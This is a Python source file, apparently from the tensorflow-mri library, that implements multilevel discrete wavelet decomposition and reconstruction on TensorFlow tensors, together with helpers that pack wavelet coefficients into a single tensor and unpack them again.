`tf.pad`_. Defaults to `'symmetric'`.\n axes: A `list` of `int`. Axes over which to compute the DWT. 
Repeated\n elements mean the DWT will be performed multiple times along these axes.\n A value of `None` (the default) selects all axes.\n\n Returns:\n A `tf.Tensor` containing the reconstructed signal.\n\n Raises:\n ValueError: If any of the inputs is not valid.\n\n .. _pywt.Wavelet: https://pywavelets.readthedocs.io/en/latest/ref/wavelets.html#pywt.Wavelet\n .. _tf.pad: https://www.tensorflow.org/api_docs/python/tf/pad\n \"\"\"\n # Drop the keys where value is None.\n coeffs = {k: v for k, v in coeffs.items() if v is not None}\n\n # Check key combinations.\n coeffs = _fix_coeffs(coeffs)\n\n # Handle complex numbers.\n if any(v.dtype.is_complex for v in coeffs.values()):\n real = {k: tf.math.real(v) for k, v in coeffs.items()}\n imag = {k: tf.math.imag(v) for k, v in coeffs.items()}\n return tf.dtypes.complex(idwt(real, wavelet, mode, axes),\n idwt(imag, wavelet, mode, axes))\n\n # key length matches the number of axes transformed\n rank_transform = max(len(key) for key in coeffs.keys())\n\n try:\n coeff_shapes = (v.shape for k, v in coeffs.items()\n if v is not None and len(k) == rank_transform)\n coeff_shape = next(coeff_shapes)\n except StopIteration:\n raise ValueError(\"`coeffs` must contain at least one non-null wavelet band\") # pylint: disable=raise-missing-from\n if any(s != coeff_shape for s in coeff_shapes):\n raise ValueError(\"`coeffs` must all be of equal size (or None)\")\n\n if axes is None:\n axes = range(rank_transform)\n ndim = rank_transform\n else:\n ndim = len(coeff_shape)\n axes = [a + ndim if a < 0 else a for a in axes]\n\n modes = _modes_per_axis(mode, axes)\n wavelets = _wavelets_per_axis(wavelet, axes)\n for key_length, (ax, wav, mod) in reversed(\n list(enumerate(zip(axes, wavelets, modes)))):\n if ax < 0 or ax >= ndim:\n raise ValueError(\"Axis greater than data dimensions\")\n\n new_coeffs = {}\n new_keys = [''.join(coef)\n for coef in itertools.product('ad', repeat=key_length)]\n\n for key in new_keys:\n lo = coeffs.get(key + 'a', None)\n hi = coeffs.get(key + 'd', None)\n new_coeffs[key] = _idwt_along_axis(lo, hi, wav, mod, ax)\n coeffs = new_coeffs\n\n return coeffs['']\n\n\n@api_util.export(\"signal.wavedec\")\ndef wavedec(data, wavelet, mode='symmetric', level=None, axes=None):\n \"\"\"Multilevel N-dimensional discrete wavelet transform (wavelet decomposition).\n\n Args:\n data: A `tf.Tensor` of real or complex type.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n level: An `int` >= 0. The decomposition level. If `None` (default),\n the maximum useful level of decomposition will be used (see\n `tfmri.signal.max_wavelet_level`).\n axes: A `list` of `int`. Axes over which to compute the DWT. Axes may not\n be repeated. A value of `None` (the default) selects all axes.\n\n Returns:\n A `list` of coefficients such as\n `[approx, {details_level_n}, ..., {details_level_1}]`. The first element\n in the list contains the approximation coefficients at level `n`. The\n remaining elements contain the detail coefficients, listed in descending\n order of decomposition level. 
Each ``details_level_i`` element is a\n `dict` containing detail coefficients at level ``i`` of the decomposition.\n As a concrete example, a 3D decomposition would have the following set of\n keys in each `details_level_i` `dict`:\n `{'aad', 'ada', 'daa', 'add', 'dad', 'dda', 'ddd'}, where the order of the\n characters in each key map to the specified `axes`.\n\n Examples:\n >>> import tensorflow as tf\n >>> import tensorflow_mri as tfmri\n >>> coeffs = tfmri.signal.wavedec(tf.ones((4, 4)), 'db1')\n >>> # Levels:\n >>> len(coeffs)-1\n 2\n >>> tfmri.signal.waverec(coeffs, 'db1')\n \n\n .. _pywt.Wavelet: https://pywavelets.readthedocs.io/en/latest/ref/wavelets.html#pywt.Wavelet\n .. _tf.pad: https://www.tensorflow.org/api_docs/python/tf/pad\n \"\"\"\n data = tf.convert_to_tensor(data)\n axes, axes_shapes, rank_transform = _prep_axes_wavedec(data.shape, axes)\n wavelets = _wavelets_per_axis(wavelet, axes)\n dec_lengths = [w.dec_len for w in wavelets]\n\n level = _check_level(axes_shapes, dec_lengths, level)\n\n coeffs_list = []\n\n a = data\n for _ in range(level):\n coeffs = dwt(a, wavelet, mode, axes)\n a = coeffs.pop('a' * rank_transform)\n coeffs_list.append(coeffs)\n\n coeffs_list.append(a)\n coeffs_list.reverse()\n\n return coeffs_list\n\n\n@api_util.export(\"signal.waverec\")\ndef waverec(coeffs, wavelet, mode='symmetric', axes=None):\n \"\"\"Multilevel N-dimensional inverse discrete wavelet transform (wavelet reconstruction).\n\n Args:\n coeffs: A `list` with the same structure as the output of\n `tfmri.signal.wavedec`.\n wavelet: A `str` or a `pywt.Wavelet`_, or a `list` thereof. When passed a\n `list`, different wavelets are applied along each axis in `axes`.\n mode: A `str`. The padding or signal extension mode. Must be one of the\n values supported by `tf.pad`_. Defaults to `'symmetric'`.\n axes: A `list` of `int`. Axes over which to compute the IDWT. Axes may not\n be repeated. A value of `None` (the default) selects all axes.\n\n Returns:\n A `tf.Tensor` containing the reconstructed signal.\n\n Examples:\n >>> import tensorflow as tf\n >>> import tensorflow_mri as tfmri\n >>> coeffs = tfmri.signal.wavedec(tf.ones((4, 4)), 'db1')\n >>> # Levels:\n >>> len(coeffs)-1\n 2\n >>> tfmri.signal.waverec(coeffs, 'db1')\n \n\n Raises:\n ValueError: If passed invalid input values.\n \"\"\"\n if len(coeffs) < 1:\n raise ValueError(\n \"Coefficient list too short (minimum 1 array required).\")\n\n a, ds = coeffs[0], coeffs[1:]\n\n # this dictionary check must be prior to the call to _fix_coeffs\n if len(ds) > 0 and not all(isinstance(d, dict) for d in ds):\n raise ValueError(\n f\"Unexpected detail coefficient type: {type(ds[0])}. 
Detail \"\n f\"coefficients must be a dict of arrays as returned by wavedec.\")\n\n # Raise error for invalid key combinations\n ds = list(map(_fix_coeffs, ds))\n\n if not ds:\n # level 0 transform (just returns the approximation coefficients)\n return coeffs[0]\n if a is None and not any(ds):\n raise ValueError(\n \"At least one coefficient must contain a valid value.\")\n\n coeff_ndims = []\n if a is not None:\n a = np.asarray(a)\n coeff_ndims.append(a.ndim)\n for d in ds:\n coeff_ndims += [v.ndim for k, v in d.items()]\n\n # test that all coefficients have a matching number of dimensions\n unique_coeff_ndims = np.unique(coeff_ndims)\n if len(unique_coeff_ndims) == 1:\n ndim = unique_coeff_ndims[0]\n else:\n raise ValueError(\n \"All coefficients must have a matching number of dimensions\")\n\n if np.isscalar(axes):\n axes = (axes, )\n if axes is None:\n axes = range(ndim)\n else:\n axes = tuple(axes)\n if len(axes) != len(set(axes)):\n raise ValueError(\"The axes passed to waverecn must be unique.\")\n rank_transform = len(axes)\n\n for idx, d in enumerate(ds):\n if a is None and not d:\n continue\n # The following if statement handles the case where the approximation\n # coefficient returned at the previous level may exceed the size of the\n # stored detail coefficients by 1 on any given axis.\n if idx > 0:\n a = _match_coeff_dims(a, d)\n d['a' * rank_transform] = a\n a = idwt(d, wavelet, mode, axes)\n\n return a\n\n\ndef _dwt_along_axis(x, wavelet, mode, axis): # pylint: disable=missing-param-doc\n \"\"\"Computes the DWT along a single axis.\"\"\"\n # Move axis `axis` to last position.\n perm = list(range(x.shape.rank))\n perm = [ax for ax in perm if ax != axis] + [axis]\n x = tf.transpose(x, perm)\n\n # Do padding.\n pad_length = len(wavelet) - 1\n paddings = [[0, 0]] * (x.shape.rank - 1) + [[pad_length, pad_length]]\n x = tf.pad(x, paddings, mode=mode) # pylint: disable=unexpected-keyword-arg,no-value-for-parameter\n\n # Add channel dimension.\n x = tf.expand_dims(x, axis=-1)\n\n # conv1d requires at least one batch dimension, so add a dummy one.\n scalar_batch = False\n if x.shape.rank == 2:\n scalar_batch = True\n x = tf.expand_dims(x, axis=0)\n\n # Shift the input tensor by 1. We take care to retain the static shape of the\n # sliced tensor.\n begin = [0] * x.shape.rank\n begin[-2] = 1\n size = tf.shape(x) - begin\n shape = x.shape.as_list()\n if shape[-2] is not None:\n shape[-2] -= 1\n x = tf.slice(x, begin, size)\n x = tf.ensure_shape(x, shape)\n\n # Get filters.\n f_lo = tf.reverse(tf.reshape(wavelet.dec_lo, [-1, 1, 1]), [0])\n f_hi = tf.reverse(tf.reshape(wavelet.dec_hi, [-1, 1, 1]), [0])\n f_lo = tf.cast(f_lo, x.dtype)\n f_hi = tf.cast(f_hi, x.dtype)\n\n # Compute approximation and detail coeffs.\n a = tf.nn.conv1d(x, f_lo, 2, 'VALID')\n d = tf.nn.conv1d(x, f_hi, 2, 'VALID')\n\n # Remove dummy scalar dimension, if necessary.\n if scalar_batch:\n a = tf.squeeze(a, axis=0)\n d = tf.squeeze(d, axis=0)\n\n # Remove channel dimension.\n a = tf.squeeze(a, axis=-1)\n d = tf.squeeze(d, axis=-1)\n\n # Invert the original permutation. 
We use NumPy intentionally here as we\n # want to do this computation statically.\n inv_perm = np.argsort(perm).tolist()\n a = tf.transpose(a, inv_perm)\n d = tf.transpose(d, inv_perm)\n\n return a, d\n\n\ndef _idwt_along_axis(a, d, wavelet, mode, axis): # pylint: disable=missing-param-doc,unused-argument\n \"\"\"Computes the IDWT along a single axis.\"\"\"\n # Move axis `axis` to last position.\n perm = list(range(a.shape.rank))\n perm = [ax for ax in perm if ax != axis] + [axis]\n a = tf.transpose(a, perm)\n d = tf.transpose(d, perm)\n\n # Add channel dimension.\n a = tf.expand_dims(a, axis=-1)\n d = tf.expand_dims(d, axis=-1)\n\n # conv1d requires at least one batch dimension, so add a dummy one.\n scalar_batch = False\n if a.shape.rank == 2:\n scalar_batch = True\n a = tf.expand_dims(a, axis=0)\n d = tf.expand_dims(d, axis=0)\n\n # Get filters.\n f_lo = tf.reverse(tf.reshape(wavelet.rec_lo, [-1, 1, 1]), [0])\n f_hi = tf.reverse(tf.reshape(wavelet.rec_hi, [-1, 1, 1]), [0])\n f_lo = tf.cast(f_lo, a.dtype)\n f_hi = tf.cast(f_hi, d.dtype)\n\n # Define length.\n input_length = 2 * tf.shape(a)[-2]\n filter_length = tf.shape(f_lo)[-3]\n output_length = input_length - filter_length + 2\n\n # Dyadic upsampling.\n a = _dyadic_upsampling(a, axis=-2, indices='even')\n d = _dyadic_upsampling(d, axis=-2, indices='even')\n\n # Do extra padding to implement \"FULL\" convolution mode.\n left_padding = len(wavelet.rec_lo) - 1\n right_padding = len(wavelet.rec_hi) - 1\n paddings = [[0, 0]] * a.shape.rank\n paddings[-2] = [left_padding, right_padding]\n a = tf.pad(a, paddings) # pylint: disable=no-value-for-parameter\n d = tf.pad(d, paddings) # pylint: disable=no-value-for-parameter\n\n # Do convolution.\n a = tf.nn.conv1d(a, f_lo, 1, 'VALID')\n d = tf.nn.conv1d(d, f_hi, 1, 'VALID')\n\n # Keep only part of the output.\n current_length = tf.shape(a)[-2]\n begin = tf.scatter_nd(\n [[tf.rank(a) - 2]], [(current_length - output_length) // 2], [tf.rank(a)])\n size = tf.tensor_scatter_nd_update(\n tf.shape(a), [[tf.rank(a) - 2]], [output_length])\n a = tf.slice(a, begin, size)\n d = tf.slice(d, begin, size)\n\n # Reconstructed signal.\n x = a + d\n\n # Remove dummy scalar dimension, if necessary.\n if scalar_batch:\n x = tf.squeeze(x, axis=0)\n\n # Remove channel dimension.\n x = tf.squeeze(x, axis=-1)\n\n # Invert the original permutation. We use NumPy intentionally here as we\n # want to do this computation statically.\n inv_perm = np.argsort(perm).tolist()\n x = tf.transpose(x, inv_perm)\n\n return x\n\n\ndef _dyadic_upsampling(x, axis=-1, indices='odd'):\n \"\"\"Performs dyadic upsampling along an axis.\n\n Args:\n x: A `tf.Tensor`.\n axis: An `int`. along which to upsample.\n indices: A `str`. Must be `'odd'` or `'even'`. 
Controls whether to upsample\n odd- or even-indexed elements.\n\n Returns:\n The upsampled `tf.Tensor`.\n \"\"\"\n # Canonicalize axis.\n axis = axis + x.shape.rank if axis < 0 else axis\n\n # Compute output shape.\n output_shape = tf.tensor_scatter_nd_update(\n tf.shape(x), [[axis]], [2 * tf.shape(x)[axis]])\n\n zeros = tf.zeros_like(x)\n x = tf.stack([x, zeros], axis=(axis + 1))\n\n # Reshape to correct shape.\n x = tf.reshape(x, output_shape)\n if indices == 'even':\n begin = tf.zeros([tf.rank(x)], dtype=tf.int32)\n size = tf.tensor_scatter_nd_update(\n tf.shape(x), [[axis]], [tf.shape(x)[axis] - 1])\n x = tf.slice(x, begin, size)\n\n elif indices == 'odd':\n paddings = tf.zeros([tf.rank(x), 2], dtype=tf.int32)\n paddings = tf.tensor_scatter_nd_update(paddings, [[axis, 0]], [1])\n x = tf.pad(x, paddings) # pylint: disable=no-value-for-parameter\n\n return x\n\n\ndef _wavelets_per_axis(wavelet, axes):\n \"\"\"Initialize Wavelets for each axis to be transformed.\n\n Args:\n wavelet: A `str` or `Wavelet` or an iterable of `str` or `Wavelet`. If a\n single wavelet is provided, it will used for all axes. Otherwise one\n wavelet per axis must be provided.\n axes: The `list` of axes to be transformed.\n\n Returns:\n A `list` of wavelets equal in length to `axes`.\n\n Raises:\n ValueError: If `wavelet` is not valid for the given `axes`.\n \"\"\"\n axes = tuple(axes)\n if isinstance(wavelet, (str, pywt.Wavelet)):\n # Same wavelet on all axes.\n wavelets = [_as_wavelet(wavelet)] * len(axes)\n elif isinstance(wavelet, collections.abc.Iterable):\n # (potentially) unique wavelet per axis (e.g. for dual-tree DWT)\n if len(wavelet) == 1:\n wavelets = [_as_wavelet(wavelet[0])] * len(axes)\n else:\n if len(wavelet) != len(axes):\n raise ValueError((\n \"The number of wavelets must match the number of axes \"\n \"to be transformed.\"))\n wavelets = [_as_wavelet(w) for w in wavelet]\n else:\n raise ValueError(\"wavelet must be a str, Wavelet or iterable\")\n return wavelets\n\n\ndef _wavelet_lengths_per_axis(wavelet_or_length, axes):\n \"\"\"Get wavelet lengths for each axis to be transformed.\n\n Args:\n wavelet_or_length: An `int`, `str`, `Wavelet` or an iterable of `int`,\n `str` or `Wavelet`. If a scalar input is provided, it will used for\n all axes. Otherwise one input per axis must be provided.\n axes: The `list` of axes to be transformed.\n\n Returns:\n A `list` of lengths equal in length to `axes`.\n\n Raises:\n ValueError: If `wavelet_or_length` is not valid for the given `axes`.\n \"\"\"\n axes = tuple(axes)\n if isinstance(wavelet_or_length, (int, str, pywt.Wavelet)):\n # Same wavelet/length on all axes.\n lengths = [_get_wavelet_length(wavelet_or_length)] * len(axes)\n elif isinstance(wavelet_or_length, collections.abc.Iterable):\n # (potentially) unique wavelet_or_length per axis (e.g. 
for dual-tree DWT)\n if len(wavelet_or_length) == 1:\n lengths = [_get_wavelet_length(wavelet_or_length[0])] * len(axes)\n else:\n if len(wavelet_or_length) != len(axes):\n raise ValueError((\n \"The number of wavelets or lengths must match the number of axes \"\n \"to be transformed.\"))\n lengths = [_get_wavelet_length(w) for w in wavelet_or_length]\n else:\n raise ValueError(\n \"wavelet_or_length must be an int, str, wavelet or iterable\")\n return lengths\n\n\ndef _get_wavelet_length(wavelet_or_length):\n if isinstance(wavelet_or_length, (str, pywt.Wavelet)):\n return _as_wavelet(wavelet_or_length).dec_len\n return wavelet_or_length\n\n\ndef _modes_per_axis(mode, axes):\n \"\"\"Initialize mode for each axis to be transformed.\n\n Args:\n mode: A `str` or an iterable of `str`. If a single mode is provided, it\n will used for all axes. Otherwise one mode per axis must be provided.\n axes: The `list` of axes to be transformed.\n\n Returns:\n A `list` of mode equal in length to `axes`.\n\n Raises:\n ValueError: If `mode` is not valid for the given `axes`.\n \"\"\"\n axes = tuple(axes)\n if isinstance(mode, str):\n # same mode on all axes\n mode = [mode] * len(axes)\n elif isinstance(mode, collections.abc.Iterable):\n if len(mode) == 1:\n mode = [mode[0]] * len(axes)\n else:\n if len(mode) != len(axes):\n raise ValueError(\n \"The number of mode must match the number \"\n \"of axes to be transformed.\")\n mode = [str(mode) for mode in mode]\n else:\n raise ValueError(\"mode must be a str or iterable\")\n return mode\n\n\ndef _as_wavelet(wavelet): # pylint: disable=missing-param-doc\n \"\"\"Convert wavelet name to a Wavelet object.\"\"\"\n if not isinstance(wavelet, (pywt.ContinuousWavelet, pywt.Wavelet)):\n wavelet = pywt.DiscreteContinuousWavelet(wavelet)\n if isinstance(wavelet, pywt.ContinuousWavelet):\n raise ValueError(\n \"A ContinuousWavelet object was provided, but only discrete \"\n \"Wavelet objects are supported by this function. A list of all \"\n \"supported discrete wavelets can be obtained by running:\\n\"\n \"print(pywt.wavelist(kind='discrete'))\")\n return wavelet\n\n\ndef _fix_coeffs(coeffs): # pylint: disable=missing-function-docstring\n missing_keys = [k for k, v in coeffs.items() if v is None]\n if missing_keys:\n raise ValueError(\n \"The following detail coefficients were set to None:\\n\"\n \"{0}\\n\"\n \"For multilevel transforms, rather than setting\\n\"\n \"\\tcoeffs[key] = None\\n\"\n \"use\\n\"\n \"\\tcoeffs[key] = np.zeros_like(coeffs[key])\\n\".format(\n missing_keys))\n\n invalid_keys = [k for k, v in coeffs.items() if\n not set(k) <= set('ad')]\n if invalid_keys:\n raise ValueError(\n \"The following invalid keys were found in the detail \"\n \"coefficient dictionary: {}.\".format(invalid_keys))\n\n key_lengths = [len(k) for k in coeffs.keys()]\n if len(np.unique(key_lengths)) > 1:\n raise ValueError(\n \"All detail coefficient names must have equal length.\")\n\n return dict((k, tf.convert_to_tensor(v)) for k, v in coeffs.items())\n\n\ndef _check_level(sizes, dec_lens, level): # pylint: disable=missing-function-docstring\n if np.isscalar(sizes):\n sizes = (sizes, )\n if np.isscalar(dec_lens):\n dec_lens = (dec_lens, )\n max_level = np.min([dwt_max_level(s, d) for s, d in zip(sizes, dec_lens)])\n if level is None:\n level = max_level\n elif level < 0:\n raise ValueError(\n \"Level value of %d is too low . 
Minimum level is 0.\" % level)\n elif level > max_level:\n warnings.warn(\n (\"Level value of {} is too high: all coefficients will experience \"\n \"boundary effects.\").format(level))\n return level\n\n\ndef _prep_axes_wavedec(shape, axes): # pylint: disable=missing-function-docstring\n rank = shape.rank\n if rank < 1:\n raise ValueError(\"Expected at least 1D input data.\")\n if np.isscalar(axes):\n axes = (axes,)\n if axes is None:\n axes = range(rank)\n else:\n axes = tuple(axes)\n if len(axes) != len(set(axes)):\n raise ValueError(\"The axes passed to wavedec must be unique.\")\n try:\n axes_shapes = [shape[ax] for ax in axes]\n except IndexError:\n raise np.AxisError(\"Axis greater than data dimensions\") # pylint: disable=raise-missing-from\n rank_transform = len(axes)\n return axes, axes_shapes, rank_transform\n\n\ndef _match_coeff_dims(a_coeff, d_coeff_dict): # pylint: disable=missing-function-docstring\n # For each axis, compare the approximation coeff shape to one of the\n # stored detail coeffs and truncate the last element along the axis\n # if necessary.\n if a_coeff is None:\n return None\n if not d_coeff_dict:\n return a_coeff\n d_coeff = d_coeff_dict[next(iter(d_coeff_dict))]\n size_diffs = np.subtract(a_coeff.shape, d_coeff.shape)\n if np.any((size_diffs < 0) | (size_diffs > 1)):\n raise ValueError(f\"incompatible coefficient array sizes: {size_diffs}\")\n return a_coeff[tuple(slice(s) for s in d_coeff.shape)]\n\n\n@api_util.export(\"signal.max_wavelet_level\")\ndef dwt_max_level(shape, wavelet_or_length, axes=None):\n \"\"\"Computes the maximum useful level of wavelet decomposition.\n\n Returns the maximum level of decomposition suitable for use with\n `tfmri.signal.wavedec`.\n\n The level returned is the minimum along all axes.\n\n Examples:\n >>> import tensorflow_mri as tfmri\n >>> tfmri.signal.max_wavelet_level((64, 32), 'db2')\n 3\n\n Args:\n shape: An `int` or a `list` thereof. The input shape.\n wavelet_or_length: A `str`, a `pywt.Wavelet`_. Alternatively, it may also be\n an `int` representing the length of the decomposition filter. This can\n also be a `list` containing a wavelet or filter length for each axis.\n axes: An `list` of `int`. 
Axes over which the DWT is to be computed.\n If `None` (default), it is assumed that the DWT will be computed along\n all axes.\n\n Returns:\n An `int` representing the maximum useful level of decomposition.\n \"\"\"\n # Canonicalize shape.\n if isinstance(shape, int):\n shape = [shape]\n shape = tf.TensorShape(shape)\n\n # Determine the axes and shape for the transform.\n axes, axes_shapes, _ = _prep_axes_wavedec(shape, axes)\n\n # Get the filter length for each transformed axis.\n lengths = _wavelet_lengths_per_axis(wavelet_or_length, axes)\n\n # Maximum level of decomposition per axis.\n max_levels = [_dwt_max_level(input_length, filter_length)\n for input_length, filter_length in zip(axes_shapes, lengths)]\n return min(max_levels)\n\n\ndef _dwt_max_level(input_length, filter_length):\n if filter_length <= 1 or input_length < filter_length - 1:\n return 0\n\n return _log2_int(input_length // (filter_length - 1))\n\n\ndef _log2_int(x):\n \"\"\"Returns the integer log2 of x.\"\"\"\n return x.bit_length() - 1\n\n\n@api_util.export(\"signal.wavelet_coeffs_to_tensor\")\ndef coeffs_to_tensor(coeffs, padding=0, axes=None):\n \"\"\"Arranges a wavelet coefficient list into a single tensor.\n\n Args:\n coeffs: A `list` of wavelet coefficients as returned by\n `tfmri.signal.wavedec`.\n padding: The value to use for the background if the coefficients cannot be\n tightly packed. If None, raise an error if the coefficients cannot be\n tightly packed.\n axes: Axes over which the DWT that created `coeffs` was performed. The\n default value of `None` corresponds to all axes.\n\n Returns:\n A `tuple` (`tensor`, `slices`) holding the coefficients\n `tf.Tensor` and a `list` of slices corresponding to each coefficient. For\n example, in a 2D tensor, `tensor[slices[1]['dd']]` would extract\n the first level detail coefficients from `tensor`.\n\n Raises:\n ValueError: If passed invalid inputs.\n\n Notes\n -----\n Assume a 2D coefficient dictionary, `c`, from a two-level transform.\n\n Then all 2D coefficients will be stacked into a single larger 2D array\n as follows::\n\n .. code-block::\n\n +---------------+---------------+-------------------------------+\n | | | |\n | c[0] | c[1]['da'] | |\n | | | |\n +---------------+---------------+ c[2]['da'] |\n | | | |\n | c[1]['ad'] | c[1]['dd'] | |\n | | | |\n +---------------+---------------+ ------------------------------+\n | | |\n | | |\n | | |\n | c[2]['ad'] | c[2]['dd'] |\n | | |\n | | |\n | | |\n +-------------------------------+-------------------------------+\n\n If the transform was not performed with mode \"periodization\" or the signal\n length was not a multiple of ``2**level``, coefficients at each subsequent\n scale will not be exactly 1/2 the size of those at the previous level due\n to additional coefficients retained to handle the boundary condition. 
In\n these cases, the default setting of `padding=0` indicates to pad the\n individual coefficient arrays with 0 as needed so that they can be stacked\n into a single, contiguous array.\n\n Examples:\n >>> import tensorflow_mri as tfmri\n >>> image = tfmri.image.phantom()\n >>> coeffs = tfmri.signal.wavedec(image, wavelet='db2', level=3)\n >>> tensor, slices = tfmri.signal.wavelet_coeffs_to_tensor(coeffs)\n \"\"\"\n coeffs, axes, ndim, ndim_transform = _prepare_coeffs_axes(coeffs, axes)\n\n # initialize with the approximation coefficients.\n a_coeffs = coeffs[0]\n a_shape = a_coeffs.shape\n\n if len(coeffs) == 1:\n # only a single approximation coefficient array was found\n return a_coeffs, [tuple([slice(None)] * ndim)]\n\n # determine size of output and if tight packing is possible\n arr_shape, is_tight_packing = _determine_coeff_array_shape(coeffs, axes)\n\n # preallocate output array\n if padding is None:\n if not is_tight_packing:\n raise ValueError(\"array coefficients cannot be tightly packed\")\n coeff_tensor = tf.zeros(arr_shape, dtype=a_coeffs.dtype)\n else:\n coeff_tensor = tf.fill(arr_shape, tf.cast(padding, a_coeffs.dtype))\n\n a_slices = tuple(slice(s) for s in a_shape)\n coeff_tensor = array_ops.update_tensor(coeff_tensor, a_slices, a_coeffs)\n\n # initialize list of coefficient slices\n coeff_slices = []\n coeff_slices.append(a_slices)\n\n # loop over the detail cofficients, adding them to coeff_tensor\n ds = coeffs[1:]\n for coeff_dict in ds:\n coeff_slices.append({}) # new dictionary for detail coefficients\n if any(d is None for d in coeff_dict.values()):\n raise ValueError(\"coeffs_to_tensor does not support missing \"\n \"coefficients.\")\n d_shape = coeff_dict['d' * ndim_transform].shape\n for key in coeff_dict.keys():\n d = coeff_dict[key]\n slice_array = [slice(None)] * ndim\n for i, let in enumerate(key):\n ax_i = axes[i] # axis corresponding to this transform index\n if let == 'a':\n slice_array[ax_i] = slice(d.shape[ax_i])\n elif let == 'd':\n slice_array[ax_i] = slice(a_shape[ax_i],\n a_shape[ax_i] + d.shape[ax_i])\n else:\n raise ValueError(\"unexpected letter: {}\".format(let))\n slice_array = tuple(slice_array)\n coeff_tensor = array_ops.update_tensor(coeff_tensor, slice_array, d)\n coeff_slices[-1][key] = slice_array\n a_shape = [a_shape[n] + d_shape[n] for n in range(ndim)]\n return coeff_tensor, coeff_slices\n\n\n@api_util.export(\"signal.tensor_to_wavelet_coeffs\")\ndef tensor_to_coeffs(coeff_tensor, coeff_slices):\n \"\"\"Extracts wavelet coefficients from tensor into a list.\n\n Args:\n coeff_tensor: A `tf.Tensor` containing all wavelet coefficients. This should\n have been generated via `tfmri.signal.wavelet_coeffs_to_tensor`.\n coeff_slices : A `list` of slices corresponding to each coefficient as\n obtained from `tensor_to_wavelet_coeffs`.\n\n Returns:\n The wavelet coefficients in the format expected by `tfmri.signal.waverec`.\n\n Raises:\n ValueError: If passed an empty list of coefficients.\n\n Notes:\n A single large array containing all coefficients will have subsets stored,\n into a `waverecn`` list, c, as indicated below::\n\n .. 
code-block::\n\n +---------------+---------------+-------------------------------+\n | | | |\n | c[0] | c[1]['da'] | |\n | | | |\n +---------------+---------------+ c[2]['da'] |\n | | | |\n | c[1]['ad'] | c[1]['dd'] | |\n | | | |\n +---------------+---------------+ ------------------------------+\n | | |\n | | |\n | | |\n | c[2]['ad'] | c[2]['dd'] |\n | | |\n | | |\n | | |\n +-------------------------------+-------------------------------+\n\n Examples:\n >>> import tensorflow_mri as tfmri\n >>> image = tfmri.image.phantom()\n >>> coeffs = tfmri.signal.wavedec(image, wavelet='db2', level=3)\n >>> tensor, slices = tfmri.signal.wavelet_coeffs_to_tensor(coeffs)\n >>> coeffs_from_arr = tfmri.signal.tensor_to_wavelet_coeffs(tensor, slices)\n >>> image_recon = tfmri.signal.waverec(coeffs_from_arr, wavelet='db2')\n >>> # image and image_recon are equal\n \"\"\"\n coeff_tensor = tf.convert_to_tensor(coeff_tensor)\n coeffs = []\n if len(coeff_slices) == 0:\n raise ValueError(\"empty list of coefficient slices\")\n coeffs.append(coeff_tensor[coeff_slices[0]])\n\n # difference coefficients at each level\n for n in range(1, len(coeff_slices)):\n d = {}\n for k, v in coeff_slices[n].items():\n d[k] = coeff_tensor[v]\n coeffs.append(d)\n return coeffs\n\n\ndef _determine_coeff_array_shape(coeffs, axes): # pylint: disable=missing-param-doc\n \"\"\"Determines the shape of the coefficients array.\"\"\"\n arr_shape = np.asarray(coeffs[0].shape)\n axes = np.asarray(axes) # axes that were transformed\n ndim_transform = len(axes)\n ncoeffs = coeffs[0].shape.num_elements()\n for d in coeffs[1:]:\n arr_shape[axes] += np.asarray(d['d'*ndim_transform].shape)[axes]\n for _, v in d.items():\n ncoeffs += v.shape.num_elements()\n arr_shape = tuple(arr_shape.tolist())\n # if the total number of coefficients doesn't equal the size of the array\n # then tight packing is not possible.\n is_tight_packing = (np.prod(arr_shape) == ncoeffs)\n return arr_shape, is_tight_packing\n\n\ndef _prepare_coeffs_axes(coeffs, axes): # pylint: disable=missing-param-doc\n \"\"\"Helper function to check type of coeffs and axes.\n\n This code is used by both coeffs_to_tensor and ravel_coeffs.\n \"\"\"\n if not isinstance(coeffs, list) or len(coeffs) == 0:\n raise ValueError(\"input must be a list of coefficients from wavedec\")\n if coeffs[0] is None:\n raise ValueError(\"coeffs_to_tensor does not support missing \"\n \"coefficients.\")\n if not isinstance(coeffs[0], tf.Tensor):\n raise ValueError(\"first list element must be a tensor\")\n ndim = coeffs[0].ndim\n\n if len(coeffs) > 1:\n if not isinstance(coeffs[1], dict):\n raise ValueError(\"invalid coefficient list\")\n\n if len(coeffs) == 1:\n # no detail coefficients were found\n return coeffs, axes, ndim, None\n\n # Determine the number of dimensions that were transformed via key length\n ndim_transform = len(list(coeffs[1].keys())[0])\n if axes is None:\n if ndim_transform < ndim:\n raise ValueError(\n \"coeffs corresponds to a DWT performed over only a subset of \"\n \"the axes. 
In this case, axes must be specified.\")\n axes = np.arange(ndim)\n\n if isinstance(axes, int):\n axes = [axes]\n\n if len(axes) != ndim_transform:\n raise ValueError(\n \"The length of axes doesn't match the number of dimensions \"\n \"transformed.\")\n\n return coeffs, axes, ndim, ndim_transform\n","repo_name":"mrphys/tensorflow-mri","sub_path":"tensorflow_mri/python/ops/wavelet_ops.py","file_name":"wavelet_ops.py","file_ext":"py","file_size_in_byte":35787,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"}
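A quick round-trip check of the transform pair defined above, written against the public tfmri.signal aliases that the module's own docstrings use (a sketch; it assumes tensorflow and tensorflow-mri are installed). idwt applied to the output of dwt should reconstruct the input up to floating-point error:

import tensorflow as tf
import tensorflow_mri as tfmri

x = tf.random.normal([8, 8])
coeffs = tfmri.signal.dwt(x, 'haar')   # single level over both axes
y = tfmri.signal.idwt(coeffs, 'haar')
print(sorted(coeffs.keys()))                 # ['aa', 'ad', 'da', 'dd']
print(float(tf.reduce_max(tf.abs(x - y))))   # ~0.0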
